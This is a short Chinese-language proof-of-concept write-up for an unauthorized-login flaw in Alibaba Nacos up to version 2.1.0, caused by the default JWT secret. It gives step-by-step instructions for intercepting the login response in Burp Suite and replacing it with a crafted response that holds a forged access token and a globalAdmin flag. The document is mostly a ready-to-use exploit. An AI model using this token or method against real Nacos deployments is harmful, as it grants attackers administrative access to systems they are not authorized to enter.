
Alibab Nacos Unauthorized Login
经发现,Nacos 存在一个影响 Nacos <= 2.1.0 版本的问题。Nacos 用户使用默认 JWT 密钥会导致未授权访问漏洞。通过该漏洞,攻击者可绕过用户名和密码认证,直接登录 Nacos 用户
Nacos <= 2.1.0 版本
步骤 1:直接访问 Nacos 网站,填写任意用户名和密码,并使用 Burpsuite 抓包。

步骤 2:拦截响应数据包。

步骤 3:按如下方式修改数据包
HTTP/1.1 200
Date: Thu, 10 Nov 2022 01:27:16 GMT
Content-Type: application/json
Content-Length: 13
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Server: elb
{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}

步骤 4:放行数据包后即可成功登录。
